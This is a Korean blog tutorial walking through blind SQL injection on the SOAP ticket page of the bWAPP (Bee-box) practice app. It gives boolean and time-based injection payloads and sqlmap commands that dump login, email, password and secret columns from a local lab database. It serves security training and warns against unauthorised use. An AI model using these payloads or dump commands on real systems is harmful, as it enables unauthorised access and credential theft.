[Bee-box] Blind SQL 인젝션 - 웹 서비스/SOAP

이번 포스팅은 Blind SQL인젝션  웹 서비스/SOAP 방법 입니다.

 

실습하는 모든 공격은 실제로 사용하시면 안됩니다.

허용받지 않은 서비스 대상에 해킹을 시도하는 행동은 금지하며,

모든 법적 책임은 사용자에게 있는 것을 명심해주세요.

 

설명에 앞서, 앞으로 하는 SQL 인젝션의 일부 공격들은 대응방안을 따로 포스팅 하지 않을게요. 

대부분 같은 설명이기 때문에 생략하고, 다른 경우 기재하도록 하겠습니다.

 

 

---

 

난이도 하

 

 

 

'bilnd sql injection- web services/soap' 를 들어가서 실습하겠습니다.

 

 

SOAP 의 자세한 개념은 아래 블로그를 참고해주세요.

https://mygumi.tistory.com/55

 

SOAP(Simple Object Access Protocol)은 애플리케이션 계층의 프로토콜을

전송 계층의 프로토콜로 사용할 수 있게 하는 프로토콜이다.

즉, HTTP, HTTPS, SMTP 등을 통하여 XML기반의 메세지가 네트워크에서 교환된다.

웹 서비스는 네트워크에 있는 정보를 모아 서비스를 제공하므로 SOAP 덕분에 물리적으로 인접하지 않은 서버에 

정보를 요청하고 요청에 대한 응답 값을 확인할 수 있다.

 

 

 

sqli_5.php는 선택한 영화에 남아 있는 티켓 수를 출력하는 페이지로, 티켓 수 출력에 SOAP을 활용하여

예매 가능한 티켓 수를 사용자에게 보여준다.

 

이 페이지는 SOAP 기능을 통해, Boolean Based SQL injection과, Time Based SQL injection이 가능하다.

 

URL에 드러난 'title' 변수에 작은따옴표를 입력하여 SQL인젝션이 가능한지 알아본다.

변수에 SQL인젝션 취약점이 있는 경우 SQL 오류메세지 출력.

 

 

 

 

 

작은따옴표를 입력했더니 오류 메세지 대신

예매 가능한 티켓이 있다는 결과만 출력하고 티켓 수는 출력 하지 않는다.

 

 

 

Boolean base SQL injection 이 가능한지 알아보기 위해서 title변수에

항상 참인 결과를 출력하는 쿼리를 입력한다.

 

마찬가지로 티켓이 남아 있다는 메세지를 출력.

 

 

즉 SOAP기능이 실행되지 않으면 티켓 수는 출력되지 않는다.

 

이번엔, 주석을 입력하지 않고 항상 참인 결과를 출력하는 쿼리를 입력한다.

 

 

 

 

'or 1=1# 이 아닌 'or 'a' ='a 뒤부분을 비워서 이어지게 함

 

 

 

 

입력 결과 SOAP 기능이 실행되어 티켓 수를 출력한다.

즉, 주입한 쿼리와 같이 참인 결과 값을 출력한다.

 

다음은 거짓일 때 출력하는 메세지를 확인해 본다.

 

 

'or 'a'='b 

a=b가 아니므로, 이 쿼리는 거짓이다. 결과는

 

 

전에 결과와 동일하다.

즉, SOAP기능이 실행되지 않는 경우, 입력한 쿼리가 거짓이라고 파악하는 것 같다.

 

 

boolean 인젝션이 통하는 것을 확인했으니, 마찬가지로 time based sql injection 도 시도해본다.

 

 

 

'or sleep(5) and 'a'='a

 

Time based SQL 인젝션 취약점이 있다면 5초 지연 후 응답을 출력 할 것이다.

 

 

지연 된 것을 보아, SQL인젝션 취약점이 존재한다는 것을 알 수 있다.

 

위 두가지 blindsql 방법으로 데이터베이스 내용을 파악할 수 있다.

 

 

---

순서에 맞춰 SQL인젝션을 시도해본다.

1. database 이름 알아보기

원래 지금까지 쓰던 문장은 아래와 같다.

'or 1=1 and length(database())=5# 이런식

이랬던 방식을 아래처럼 바꾸어준 것이다.

'or length(database())=5 and 'a'='a

순서를 바꿔 주었다고 생각하면 된다. soap 기능이 실행되게끔 하려면, 뒤에 붙여서 이어주자.

위 방법이 Boolean base sql 인젝션이라고 할 수 있다.

아래는 Time based 방식을 설명하겠다.

DB이름을 알아낼때 지난번까지 쓰던 방식은

'or 1=1 and length(database())=5 and sleep(5)# 이런 방식이였다. 즉 boolean base방법에 sleep함수를 그냥 뒤에 붙여 주는 방식이였는데

'or length(database())=5 and sleep(5) and 'a'='a 이런 방식으로  바꿔 주면된다.


'or sleep(5) and length(database())=5 and 'a'='a 순서는 이렇게도 상관없음.


2. DB이름 알아보기


--> boolean
'or 1=1 and substring(database(),1,1)='a'#

여기서 순서를 바꿔주면

'or substring(database(),1,1)='a' and 'a'='a



--->time based sql injection

'or 1=1 and substring(database(),1,1)='a' and sleep(5)#

이런 방식이였던 것에 순서를 바꿔주면

'or substring(database(),1,1)='b' and sleep(5) and 'a'='a

 

---

 

이런식으로 쭉 시도해서 저번 실습들처럼 길이와 이름을 차차 알아가면 된다.

 

 

하지만 하나하나 일일이 쿼리를 입력하면 시간이 많이 걸리기때문에

SQL인젝션 공격 자동화 도구 sqlmap을 사용해보겠다.

 

먼저 칼리리눅스를 켠다.

 

 

sqlmap 접속한다. 

옵션을 사용하여 공격을 시도해볼건데, 그러기 위해 꼭 필요한 cookie 값을 먼저 구해준다.

 

버프슈트를 사용해서 HTTP 연결 요청시에 패킷에 존재하는 쿠키 헤더 값을 가져오면 되는데,

프록시 설정하고, 이래저래 할 일이 많아 번거로울 수 있으니,

 

 

 

"쿠키 에디터" 를 받아서 사용하는 것을 추천한다.

사용할 일도 많을 뿐더러 수시로 쿠키세션 값을 편하게 확인 할 수 있어서 유용하다.

 

 

이렇게 쿠키값을 알았으면, 옵션을 사용해서 sql인젝션을 시도해보자!

 

처음엔 title오류가 떴었으나 고쳤어요ㅠㅠ

 

 

---

sqlmap의 옵션

-h : 다른 옵션 확인하기

-u : 자동화 공격을 시도할 페이지의 주소를 입력

--data : 변수를 명시

--cookie : 쿠키 값입력

-p : 공격할 변수를 설정

--dbs : 데이터베이스 구조 확인

--batch : sqlmap에 기본 설정된 값을 자동으로 입력하고 인젝션을 진행

 

 

 

sqlmap명령어

 

 

1. DB명 구하기

 

root@kali:/# sqlmap -u "http://192.168.0.32/bWAPP/sqli_5.php" 
--cookie="security_level=0; has_js=1; PHPSESSID=b2bb95147170a2166f7e9fc8d4b7e05d"
--data "title=G.I.+Joe%3A+Retaliation&action=go" -p "title" --dbs

 

참고로 맨앞 root@kali는 당연히 제 경로 적혀있는거고,

http뒤 주소는 자신의 ip즉 자신의 서버 주소 적으셔야 하고,

cookie역시 본인에 sessid를 입력하셔야 합니다.

 

 

한글자씩 뽑아주네요 ㅋㅋㅋ

4개의 데이터베이스 추출!

 

 

2. 테이블명 구하기

 

sqlmap -u "http://192.168.0.32/bWAPP/sqli_5.php"
--cookie = "security_level=0; has_js=1; PHPSESSID=b2bb95147170a2166f7e9fc8d4b7e05d"
--data "title=G.I.+Joe%3A+Retaliation&action=go" -p "title" -D bWAPP --tables

 

 

3. 컬럼 명 구하기

 

sqlmap -u "http://192.168.0.32/bWAPP/sqli_5.php" 

--cookie = "security_level=0; has_js=1; PHPSESSID=b2bb95147170a2166f7e9fc8d4b7e05d"
--data "title=G.I.+Joe%3A+Retaliation&action=go" -p "title" -D bWAPP -T users
--columns

 

 

 

 

4. 데이터 출력

 

sqlmap -u "http://192.168.0.32/bWAPP/sqli_5.php" 

--cookie = "security_level=0; has_js=1; PHPSESSID=b2bb95147170a2166f7e9fc8d4b7e05d"
--data "title=G.I.+Joe%3A+Retaliation&action=go" -p "title" -D bWAPP
-T users -C login,email,password,secret --dump --batch

 

 

 

SQL인젝션 성공!

 

 

대응방안  :  PHP 기본제공 함수 mysql_real_escape_string()함수로 입력 데이터 우회